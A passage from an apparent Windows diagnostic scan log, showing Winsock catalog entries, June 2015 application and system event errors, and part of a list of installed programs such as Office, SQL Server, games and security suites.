Catalog5 03 C:\Windows\SysWOW64\pnrpnsp.dll [65024] (Microsoft Corporation)
Catalog5 04 C:\Windows\SysWOW64\pnrpnsp.dll [65024] (Microsoft Corporation)
Catalog5 05 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog5 06 C:\Windows\SysWOW64\winrnr.dll [20992] (Microsoft Corporation)
Catalog5 07 C:\Windows\SysWOW64\wshbth.dll [36352] (Microsoft Corporation)
Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280] (Microsoft Corp.)
Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280] (Microsoft Corp.)
Catalog9 01 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 02 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 03 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 04 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 05 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 06 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 07 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 08 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 09 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 10 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 11 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
x64-Catalog5 01 C:\Windows\System32\NLAapi.dll [70656] (Microsoft Corporation)
x64-Catalog5 02 C:\Windows\System32\napinsp.dll [68096] (Microsoft Corporation)
x64-Catalog5 03 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 04 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 05 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog5 06 C:\Windows\System32\winrnr.dll [28672] (Microsoft Corporation)
x64-Catalog5 07 C:\Windows\System32\wshbth.dll [47104] (Microsoft Corporation)
x64-Catalog5 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [170880] (Microsoft Corp.)
x64-Catalog5 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [170880] (Microsoft Corp.)
x64-Catalog9 01 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 02 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 03 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 04 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 05 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 06 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 07 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 08 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 09 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 10 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 11 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
 
========================= Event log errors: ===============================
 
Application errors:
==================
Error: (06/05/2015 11:26:15 PM) (Source: Application Hang) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.17801 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 15a0
 
Start Time: 01d0a005563bad8a
 
Termination Time: 13
 
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
 
Report Id:
 
Error: (06/05/2015 10:06:29 PM) (Source: CVHSVC) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: A connection with the server could not be established
 
Error: (06/05/2015 09:58:57 PM) (Source: CVHSVC) (User: )
Description: Information only.
(Stream product id=0x0066): Streaming Failed
 
Error: (06/05/2015 09:57:34 PM) (Source: CVHSVC) (User: )
Description: Information only.
Too many failures while downloading ranges: 2
 
Error: (06/05/2015 09:54:49 PM) (Source: Application Error) (User: )
Description: Faulting application name: srvc.exe, version: 1.0.0.1, time stamp: 0x4fb9ca73
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0xb94
Faulting application start time: 0xsrvc.exe0
Faulting application path: srvc.exe1
Faulting module path: srvc.exe2
Report Id: srvc.exe3
 
Error: (06/05/2015 09:54:28 PM) (Source: HandsFree Client) (User: )
Description: HandsFree Client error:The service has detected an error and stopped.
 
Error: (06/05/2015 04:47:02 PM) (Source: Application Error) (User: )
Description: Faulting application name: AA2Play English.exe, version: 1.0.4.0, time stamp: 0x53b5fe5d
Faulting module name: AA2Play English.exe, version: 1.0.4.0, time stamp: 0x53b5fe5d
Exception code: 0xc0000005
Fault offset: 0x00075f50
Faulting process id: 0x1850
Faulting application start time: 0xAA2Play English.exe0
Faulting application path: AA2Play English.exe1
Faulting module path: AA2Play English.exe2
Report Id: AA2Play English.exe3
 
Error: (06/05/2015 03:10:12 PM) (Source: CVHSVC) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: A connection with the server could not be established
 
Error: (06/05/2015 03:02:42 PM) (Source: CVHSVC) (User: )
Description: Information only.
(Stream product id=0x0066): Streaming Failed
 
Error: (06/05/2015 03:02:11 PM) (Source: CVHSVC) (User: )
Description: Information only.
Too many failures while downloading ranges: 2
 
 
System errors:
=============
Error: (06/05/2015 10:23:19 PM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.199.1801.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.8.0204.00
 
Source Path: 4.8.0204.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (06/05/2015 10:22:55 PM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureCommand with the following error: 
%%5
 
Error: (06/05/2015 10:04:42 PM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for Start with the following error: 
%%5
 
Error: (06/05/2015 10:03:42 PM) (Source: iaStor) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
 
Error: (06/05/2015 10:01:15 PM) (Source: Service Control Manager) (User: )
Description: The Windows Update service hung on starting.
 
Error: (06/05/2015 09:59:49 PM) (Source: Service Control Manager) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (06/05/2015 09:59:19 PM) (Source: Service Control Manager) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (06/05/2015 09:56:24 PM) (Source: WMPNetworkSvc) (User: )
Description: Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
 
Error: (06/05/2015 09:55:39 PM) (Source: Service Control Manager) (User: )
Description: The Trend Micro Client/Server Security Agent service failed to start due to the following error: 
%%1053
 
Error: (06/05/2015 09:55:39 PM) (Source: Service Control Manager) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Trend Micro Client/Server Security Agent service to connect.
 
 
Microsoft Office Sessions:
=========================
Error: (06/05/2015 11:26:15 PM) (Source: Application Hang)(User: )
Description: IEXPLORE.EXE11.0.9600.1780115a001d0a005563bad8a13C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
 
Error: (06/05/2015 10:06:29 PM) (Source: CVHSVC)(User: )
Description: (Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: A connection with the server could not be established
 
Error: (06/05/2015 09:58:57 PM) (Source: CVHSVC)(User: )
Description: (Stream product id=0x0066): Streaming Failed
 
Error: (06/05/2015 09:57:34 PM) (Source: CVHSVC)(User: )
Description: Too many failures while downloading ranges: 2
 
Error: (06/05/2015 09:54:49 PM) (Source: Application Error)(User: )
Description: srvc.exe1.0.0.14fb9ca73unknown0.0.0.000000000c000000500000000b9401d09ffbb837c2bcC:\Program Files (x86)\HandsFree\Client\srvc.exeunknown03114b81-0bef-11e5-afce-005056c00008
 
Error: (06/05/2015 09:54:28 PM) (Source: HandsFree Client)(User: )
Description: HandsFree Client error:The service has detected an error and stopped.
 
Error: (06/05/2015 04:47:02 PM) (Source: Application Error)(User: )
Description: AA2Play English.exe1.0.4.053b5fe5dAA2Play English.exe1.0.4.053b5fe5dc000000500075f50185001d09fd0a2186e03C:\illusion\ArtificialAcademy2\AA2Play English.exeC:\illusion\ArtificialAcademy2\AA2Play English.exe04474518-0bc4-11e5-9e96-005056c00008
 
Error: (06/05/2015 03:10:12 PM) (Source: CVHSVC)(User: )
Description: (Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: A connection with the server could not be established
 
Error: (06/05/2015 03:02:42 PM) (Source: CVHSVC)(User: )
Description: (Stream product id=0x0066): Streaming Failed
 
Error: (06/05/2015 03:02:11 PM) (Source: CVHSVC)(User: )
Description: Too many failures while downloading ranges: 2
 
 
=========================== Installed Programs ============================
 
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
AccelerometerP11 (HKLM-x32\...\{87434D51-51DB-4109-B68F-A829ECDCF380}) (Version: 2.00.10.22 - STMicroelectronics)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.287 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe InDesign CS6 (HKLM-x32\...\{CFB770D7-8D43-1014-922B-CC2715FADE3F}) (Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Reader X (10.1.6) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.6 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.8.638 - Adobe Systems, Inc.)
Age of Empires II: HD Edition (HKLM-x32\...\Steam App 221380) (Version:  - Hidden Path Entertainment, Ensemble Studios)
Apple Application Support (HKLM-x32\...\{EB879750-CCBD-4013-BFD5-0294D4DA5BD0}) (Version: 2.1.7 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AuthenTec Fingerprint Software (HKLM\...\{560DCF39-61D1-43B0-86DA-5EFF8F7A5144}) (Version: 8.4.4.20 - AuthenTec, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BioAPI Framework (HKLM\...\{9DAED4FC-2B0E-4F3F-8141-F2ABF02CCFCB}) (Version: 1.0.2 - Dell Inc.) Hidden
Broadcom NetXtreme-I Netlink Driver and Management Installer (HKLM\...\{64973F6A-8754-43D1-BDD0-FC6F0546347B}) (Version: 14.4.6.2 - Broadcom Corporation)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Custom (HKLM\...\{7206B668-FEE0-455B-BB1F-9B5A2E0EC94A}) (Version: 01.00.00.000 - Wave Systems Corp.) Hidden
CyberLink PowerDVD 9.5 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.5.1.3225 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery Manager (HKLM\...\{50B4B603-A4C6-4739-AE96-6C76A0F8A388}) (Version: 1.3.1 - Dell Inc.)
Dell Data Protection | Access (HKLM\...\{ABBA2EA4-740E-4052-902B-9CA70B081E3F}) (Version: 01.01.01.001 - Wave Systems Corp) Hidden
Dell Data Protection | Access (HKLM-x32\...\{A7D91856-258D-4C87-8041-B170851CE432}) (Version: 2.0.00001.001 - Dell Inc.)
Dell Data Protection | Access | Drivers (HKLM-x32\...\{4E4E65EE-C456-45AC-B5AD-C62C3A325BD0}) (Version: 1.00.011 - Dell Inc.)
Dell Data Protection | Access | Middleware (HKLM-x32\...\{841CBDD5-4BB5-403E-AEE3-2FADC3890BE8}) (Version: 1.00.005 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.7.0.6 - Dell)
Dell System Manager (HKLM\...\{FDF509ED-9624-4FDE-9BAA-9566C186AB96}) (Version: 1.6.00000 - Dell Inc.)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1208.101.116 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.28 - Creative Technology Ltd)
DellAccess (HKLM\...\{F839C6BD-E92E-48FA-9CE6-7BFAF94F7096}) (Version: 01.01.00.053 - Wave Systems Corp.) Hidden
Digital Line Detect (HKLM-x32\...\{E646DCF0-5A68-11D5-B229-002078017FBF}) (Version: 1.21 - BVRP Software, Inc)
DirectX 9 Runtime (HKLM-x32\...\{AF9E97C1-7431-426D-A8D5-ABE40995C0B1}) (Version: 1.00.0000 - Sonic Solutions) Hidden
EMBASSY Security Center (HKLM\...\{EEAFE1E5-076B-430A-96D9-B567792AFA88}) (Version: 04.03.00.067 - Wave Systems Corp.) Hidden
EPSON Printer Software (HKLM\...\EPSON Printer and Utilities) (Version:  - )
FileZilla Client 3.6.0.2 (HKLM-x32\...\FileZilla Client) (Version: 3.6.0.2 - FileZilla Project)
FileZilla Server (HKLM-x32\...\FileZilla Server) (Version: beta 0.9.39 - FileZilla Project)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Gemalto (HKLM\...\{91CE5F03-3A2A-4268-935A-04944F058AE9}) (Version: 01.64.01.0010 - Wave Systems Corp) Hidden
Glyph (HKLM-x32\...\Glyph) (Version:  - Trion Worlds, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 43.0.2357.81 - Google Inc.)
Google Drive (HKLM-x32\...\{35574F09-89F9-4B16-B69B-64F3E25901B8}) (Version: 1.21.9226.6034 - Google, Inc.)
Google Talk Plugin (HKLM-x32\...\{3F15E203-BC3E-3597-84CD-EDF99546C917}) (Version: 3.2.4.8431 - Google)
Google Talk Plugin (HKLM-x32\...\{CA3DD97D-1FD7-37A7-BD5C-FC4430C8B8E6}) (Version: 5.41.2.0 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.27.5 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
GoToMeeting 5.4.0.1082 (HKCU\...\GoToMeeting) (Version: 5.4.0.1082 - CitrixOnline)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HF pAppLoc version 1.1 (HKLM-x32\...\{9143B17E-BBDE-4EA7-A4E3-20D384D9C8A5}_is1) (Version: 1.1 - Inquisitor)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.241 - SurfRight B.V.)
ILLUSION ジンコウガクエン2 (HKLM-x32\...\{AF83EF7D-353A-4E0C-9919-C4E4BCB5F742}) (Version: 1.00.0000 - ILLUSION)
ILLUSION ジンコウガクエン2 きゃらめいく (HKLM-x32\...\{A56F495B-7075-4510-AC91-485416140DA2}) (Version: 1.00.0000 - ILLUSION)
Intel® Identity Protection Technology 1.0.71.0 (HKLM-x32\...\{2C43790E-8470-1027-82D3-DF319F3C410F}) (Version: 1.0.71.0 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4101 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{4C1CCA11-0D08-4D5E-8444-2D9FB48BCABF}) (Version: 14.00.20110 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Itibiti RTC (HKLM-x32\...\{730E03E4-350E-48E5-9D3E-4329903D454D}) (Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
join.me (HKCU\...\JoinMe) (Version: 1.7.0.138 - LogMeIn, Inc.)
Juniper Networks Network Connect 7.4.0 (HKLM-x32\...\Juniper Network Connect 7.4.0) (Version: 7.4.0.27757 - Juniper Networks)
Juniper Networks, Inc. Setup Client (HKCU\...\Juniper_Setup_Client) (Version: 7.4.6.40675 - Juniper Networks, Inc.)
Juniper Networks, Inc. Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks, Inc.)
Junk Mail filter update (HKLM-x32\...\{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.1.6.1022 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.6.1022 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.)
Medieval II: Total War (HKLM-x32\...\Steam App 4700) (Version:  - The Creative Assembly)
Mesh Runtime (HKLM-x32\...\{8C6D6116-B724-4810-8F2D-D047E6B7D68E}) (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4719.1002 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Report Viewer 2012 Runtime (HKLM-x32\...\{9CCE40CE-A9E6-4916-8729-B008558EEF3F}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SkyDrive (HKCU\...\SkyDriveSetup.exe) (Version: 17.0.2003.1112 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{83F2B8F4-5CF3-4BE9-9772-9543EAE4AC5F}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{AB4AE7E5-E63E-458E-A9D9-B271EA2ED69B}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL Compiler Service  (HKLM\...\{BEB0F91E-F2EA-48A1-B938-7857ABF2A93D}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom  (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{C3F6F200-6D7B-4879-B9EE-700C0CE1FCDA}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{F1949145-EB64-4DE7-9D81-E6D27937146C}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Isolated) - ENU (HKLM-x32\...\{D64B6984-242F-32BC-B008-752806E5FC44}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Modem Diagnostic Tool (HKLM\...\{0335701D-8E28-4A7F-B0EF-312974755BB2}) (Version: 1.0.28.0 - Dell)
Mozilla Firefox 29.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 29.0.1 (x86 en-US)) (Version: 29.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
Mozilla Thunderbird 17.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 17.0 (x86 en-US)) (Version: 17.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Netwaiting (HKLM-x32\...\{3F92ABBB-6BBF-11D5-B229-002078017FBF}) (Version: 2.5.59 - BVRP Software, Inc)
Norton Security Suite (HKLM-x32\...\N360) (Version: 21.7.0.11 - Symantec Corporation)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.9.3 - )
NTRU TCG Software Stack (HKLM\...\{75E0B85A-085F-4BA3-B2BF-1995AFD8024D}) (Version: 2.1.34 - Security Innovation) Hidden
O2Micro Flash Memory Card Windows Driver (HKLM-x32\...\{938A412F-78C1-4158-8590-038A1D670A57}) (Version: 3.0.07.47 - O2Micro International LTD.) Hidden
O2Micro Flash Memory Card Windows Driver (HKLM-x32\...\InstallShield_{938A412F-78C1-4158-8590-038A1D670A57}) (Version: 3.0.07.47 - O2Micro International LTD.)
O2Micro OZ776 SCR Driver (HKLM\...\{732D0C79-C6E3-4EDE-8D11-67D58697E0DE}) (Version: 2.1.4.210GS - O2Micro) Hidden
O2Micro OZ776 SCR Driver (HKLM-x32\...\InstallShield_{732D0C79-C6E3-4EDE-8D11-67D58697E0DE}) (Version: 2.1.4.210GS - O2Micro)
Office 15 Click-to-Run Extensibility Component (HKLM-x32\...\{90150000-008C-0000-0000-0000000FF1CE}) (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (HKLM\...\{90150000-008F-0000-1000-0000000FF1CE}) (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (HKLM-x32\...\{90150000-008C-0409-0000-0000000FF1CE}) (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
OpenOffice.org 3.3 (HKLM-x32\...\{3E171899-0175-47CC-84C4-562ACDD4C021}) (Version: 3.3.9567 - OpenOffice.org)
Opera Mobile (HKLM-x32\...\{FA55C144-16EC-4C19-ABFF-2E172C26950D}_is1) (Version:  - Opera Software ASA)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
